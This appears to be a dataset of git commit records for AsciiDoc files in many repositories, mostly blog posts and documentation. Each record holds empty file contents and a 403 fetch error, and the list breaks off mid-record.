{"commit":"aa8bc7087ef9f8ea205fe1f92313d3d325c72cd6","subject":"Update 2015-08-06-TO-DELE.adoc","message":"Update 2015-08-06-TO-DELE.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-TO-DELE.adoc","new_file":"_posts\/2015-08-06-TO-DELE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e82f16c0d1c0a2a6de42c6ea971a6c6163b8f665","subject":"Update 2017-06-17-Carpets.adoc","message":"Update 2017-06-17-Carpets.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-06-17-Carpets.adoc","new_file":"_posts\/2017-06-17-Carpets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b2a8c0ff7ce6ed932120d64f5f35fab016151d5","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e32d60fac20430b2c73d39a4269b654df70ef320","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 
2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71b7b7b0e43972bff0b4522def025188503ec5e2","subject":"Add another interesting aspect of my PHP approach","message":"Add another interesting aspect of my PHP approach\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/01-introduction.adoc","new_file":"src\/sections\/01-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef0542dfec646856a831680ef795c87308deb499","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e90cc3ebc99f56f6a6e89e608a1b7797b416f2b","subject":"Update 2016-02-22-Ground-Zero.adoc","message":"Update 2016-02-22-Ground-Zero.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-22-Ground-Zero.adoc","new_file":"_posts\/2016-02-22-Ground-Zero.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dc1bb5c4050c7b5d195a51fb8573a8a84a6f691","subject":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","message":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"875e3e0167d8c0038b65c587f1169437bb2e8f0c","subject":"Update 2015-03-27-My-Individualism.adoc","message":"Update 2015-03-27-My-Individualism.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-27-My-Individualism.adoc","new_file":"_posts\/2015-03-27-My-Individualism.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bec1b4f6a38624bf04dd751bcab97b0e550bcec","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15ee6f45e053a3de0285872e546a648b95626956","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b646721b6ceac95024d60896225ca36e677bee54","subject":"Update 2016-10-21-opensource-paas.adoc","message":"Update 2016-10-21-opensource-paas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-21-opensource-paas.adoc","new_file":"_posts\/2016-10-21-opensource-paas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e86db7507954797f1a06ad4bdc7e3a2b0232abee","subject":"Update 2014-05-13-Episode-7-The-Norm-and-Beyond.adoc","message":"Update 2014-05-13-Episode-7-The-Norm-and-Beyond.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-05-13-Episode-7-The-Norm-and-Beyond.adoc","new_file":"_posts\/2014-05-13-Episode-7-The-Norm-and-Beyond.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27d54056754d0bd0d0eaea2de5eccde50665ae71","subject":"Update 2015-10-14-Chapters-plugin-for-WordPress.adoc","message":"Update 2015-10-14-Chapters-plugin-for-WordPress.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-10-14-Chapters-plugin-for-WordPress.adoc","new_file":"_posts\/2015-10-14-Chapters-plugin-for-WordPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"103d559b93b0aa41e80bec8658314726347e1b46","subject":"Update 2017-03-16-Installing-Tomcat-8-on-RHEL-6.adoc","message":"Update 
2017-03-16-Installing-Tomcat-8-on-RHEL-6.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-16-Installing-Tomcat-8-on-RHEL-6.adoc","new_file":"_posts\/2017-03-16-Installing-Tomcat-8-on-RHEL-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1f4d92c019358f170f62ebfcdf460b6022371bc","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/01\/07\/deref.adoc","new_file":"content\/news\/2022\/01\/07\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5c924cb9b04ad32430a317f9f50de0e00bd87889","subject":"y2b create post 4 Year Old Discovers Sega Genesis","message":"y2b create post 4 Year Old Discovers Sega Genesis","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-09-4-Year-Old-Discovers-Sega-Genesis.adoc","new_file":"_posts\/2014-06-09-4-Year-Old-Discovers-Sega-Genesis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23c179427c659c3d6e067c34136ee4de8352fb1a","subject":"another minor change","message":"another minor change\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"packet_builder_yaml.asciidoc","new_file":"packet_builder_yaml.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"abb18fe94a01a7d88396299a6598e92c9774ec52","subject":"Create OSX.adoc","message":"Create OSX.adoc","repos":"Abdennebi\/ProTips","old_file":"OSX.adoc","new_file":"OSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Abdennebi\/ProTips.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"822a3ed024da0a703353bf471a8ccf93fa080949","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"390d24a1f36f5bed0c3a70e1e8082e8fd9ea58ae","subject":"Update 20161110-1328-have-fun.adoc","message":"Update 
20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1328-have-fun.adoc","new_file":"_posts\/20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38e4b28c8b66dc20b5290028be0e4a8dca17d92b","subject":"Update 2016-04-02-Deneme-Yazi.adoc","message":"Update 2016-04-02-Deneme-Yazi.adoc","repos":"BulutKAYA\/bulutkaya.github.io,BulutKAYA\/bulutkaya.github.io,BulutKAYA\/bulutkaya.github.io,BulutKAYA\/bulutkaya.github.io","old_file":"_posts\/2016-04-02-Deneme-Yazi.adoc","new_file":"_posts\/2016-04-02-Deneme-Yazi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BulutKAYA\/bulutkaya.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94bea5c0f2846df7c78ed2dfaa78b1b198c92950","subject":"Update 2016-08-23-MSVC-P40dll.adoc","message":"Update 2016-08-23-MSVC-P40dll.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-08-23-MSVC-P40dll.adoc","new_file":"_posts\/2016-08-23-MSVC-P40dll.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bdfeeb4250418441907eadbd02619e8c18aee90","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"815a4e3e95bb35b84c373f02749e224c80d81972","subject":"Update 2018-01-27-Google-Home.adoc","message":"Update 2018-01-27-Google-Home.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-27-Google-Home.adoc","new_file":"_posts\/2018-01-27-Google-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf26631f8bbb3616c4a0e8aa6dfe10e42e3761ab","subject":"Add CIP for calling procedures","message":"Add CIP for calling procedures\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2015-06-24-call-procedures.adoc","new_file":"cip\/CIP2015-06-24-call-procedures.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"4c26cd43cc02c9db860108c2bd89cc4d7cc6b49c","subject":"Update 2015-08-30-HubPress.adoc","message":"Update 2015-08-30-HubPress.adoc","repos":"rizalp\/rizalp.github.io,rizalp\/rizalp.github.io,rizalp\/rizalp.github.io","old_file":"_posts\/2015-08-30-HubPress.adoc","new_file":"_posts\/2015-08-30-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rizalp\/rizalp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e055b5fff849de284b01ddbc5533bd451930b0aa","subject":"up news","message":"up news\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-new-website.adoc","new_file":"_posts\/2017-09-01-new-website.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09f98fdb91550a477dbbc78bd96a6fe53f38fe74","subject":"enhanced \"improvement-backlog\", moved to its own file, first version of tabular description","message":"enhanced \"improvement-backlog\", moved to its own file, first version of tabular description\n","repos":"aim42\/aim42,kitenco\/aim42,feststelltaste\/aim42,aim42\/aim42,kitenco\/aim42,rschimmack\/aim42,rschimmack\/aim42,feststelltaste\/aim42","old_file":"src\/main\/asciidoc\/patterns\/crosscutting\/improvement-backlog.adoc","new_file":"src\/main\/asciidoc\/patterns\/crosscutting\/improvement-backlog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rschimmack\/aim42.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bdb1238fdb9aa3206c6f4c1fe091c0ca55bf1c19","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fadf04eff77698a671961a83570c897f0cdea39f","subject":"y2b create post Unboxing Google Home Mini With Demar DeRozan!","message":"y2b create post Unboxing Google Home Mini With Demar DeRozan!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-19-Unboxing-Google-Home-Mini-With-Demar-DeRozan.adoc","new_file":"_posts\/2017-12-19-Unboxing-Google-Home-Mini-With-Demar-DeRozan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cb88a55178cac497f0e03bfe4e4de001bd846ec","subject":"Add instructions for how to generate artifacts","message":"Add instructions for how to generate 
artifacts\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"grammar\/README.adoc","new_file":"grammar\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ffc5be85309ef150c99a56a87d94e6e6448277b","subject":"WICKET-6395 removed reference to no longer existing factory method Link#onClick","message":"WICKET-6395 removed reference to no longer existing factory method\nLink#onClick\n","repos":"selckin\/wicket,bitstorm\/wicket,mosoft521\/wicket,dashorst\/wicket,aldaris\/wicket,selckin\/wicket,aldaris\/wicket,apache\/wicket,apache\/wicket,bitstorm\/wicket,mosoft521\/wicket,bitstorm\/wicket,mosoft521\/wicket,apache\/wicket,dashorst\/wicket,dashorst\/wicket,apache\/wicket,selckin\/wicket,selckin\/wicket,dashorst\/wicket,aldaris\/wicket,bitstorm\/wicket,bitstorm\/wicket,mosoft521\/wicket,dashorst\/wicket,mosoft521\/wicket,apache\/wicket,selckin\/wicket,aldaris\/wicket,aldaris\/wicket","old_file":"wicket-user-guide\/src\/main\/asciidoc\/helloWorld\/helloWorld_4.adoc","new_file":"wicket-user-guide\/src\/main\/asciidoc\/helloWorld\/helloWorld_4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/wicket.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ae38cfbaec24ed4ab5a28f091e2c9173ab06ea58","subject":"[DOCS] Update getting-started.asciidoc (#29518)","message":"[DOCS] Update getting-started.asciidoc (#29518)\n\nHighlighted that you can change shard counts using `_shrink` and `_split`.","repos":"GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/getting-started.asciidoc","new_file":"docs\/reference\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8703127fe64838c3466dea173da984eaa66770ee","subject":"Added IoCs for Kasidet","message":"Added IoCs for 
Kasidet\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"kasidet\/README.adoc","new_file":"kasidet\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"62bfcd9887b721e0c29888ea433495fbdf329a05","subject":"y2b create post GUY THROWS iPad OUT WINDOW!","message":"y2b create post GUY THROWS iPad OUT WINDOW!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-28-GUY-THROWS-iPad-OUT-WINDOW.adoc","new_file":"_posts\/2012-03-28-GUY-THROWS-iPad-OUT-WINDOW.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68cdd4af9cc36544a5f32f46272cfd9830fa866e","subject":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","message":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8303dbcace359ac1f426a9c831e4dc380ccc23ae","subject":"Update 2017-02-04-hello-world.adoc","message":"Update 2017-02-04-hello-world.adoc","repos":"uxc\/uxc.github.io,uxc\/uxc.github.io,uxc\/uxc.github.io,uxc\/uxc.github.io","old_file":"_posts\/2017-02-04-hello-world.adoc","new_file":"_posts\/2017-02-04-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uxc\/uxc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35f2c8a09ed8fec0d1d394910f233a2cfa37d66a","subject":"Update 2018-03-14-golangphper.adoc","message":"Update 2018-03-14-golangphper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-14-golangphper.adoc","new_file":"_posts\/2018-03-14-golangphper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44351567696c641df917a0bf6f756e70945dc58a","subject":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","message":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"930cfde5baa6dc342d2beb729e50e4ac83465f99","subject":"create post Unboxing The World's Smallest Phone","message":"create post Unboxing The World's Smallest Phone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Unboxing-The-Worlds-Smallest-Phone.adoc","new_file":"_posts\/2018-02-26-Unboxing-The-Worlds-Smallest-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3de28fdaf22f0581ab55e4b0ccaf362713a4e2b2","subject":"y2b create post Jumping Sumo Robot Demo (CES 2014)","message":"y2b create post Jumping Sumo Robot Demo (CES 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-09-Jumping-Sumo-Robot-Demo-CES-2014.adoc","new_file":"_posts\/2014-01-09-Jumping-Sumo-Robot-Demo-CES-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c39bbb74073d97d45f7dde41294a140b8b25027","subject":"Update to reference doc","message":"Update to reference doc\n","repos":"spring-projects\/spring-social-facebook,rams2588\/spring-social-facebook,pjkCochin\/spring-social-facebook,dtrunk90\/spring-social-facebook,spring-projects\/spring-social-facebook,pjkCochin\/spring-social-facebook,rams2588\/spring-social-facebook,dtrunk90\/spring-social-facebook","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjkCochin\/spring-social-facebook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"39763e10e35eebae0c159907ea5389af33890af5","subject":"Update 2015-07-01-Old-post.adoc","message":"Update 2015-07-01-Old-post.adoc","repos":"mathieu-pousse\/hubpress.io,mathieu-pousse\/hubpress.io,mathieu-pousse\/hubpress.io","old_file":"_posts\/2015-07-01-Old-post.adoc","new_file":"_posts\/2015-07-01-Old-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mathieu-pousse\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"742153fc22a4798674cc5b821656a57165dac13c","subject":"Add a GitHub SUPPORT document","message":"Add a GitHub SUPPORT 
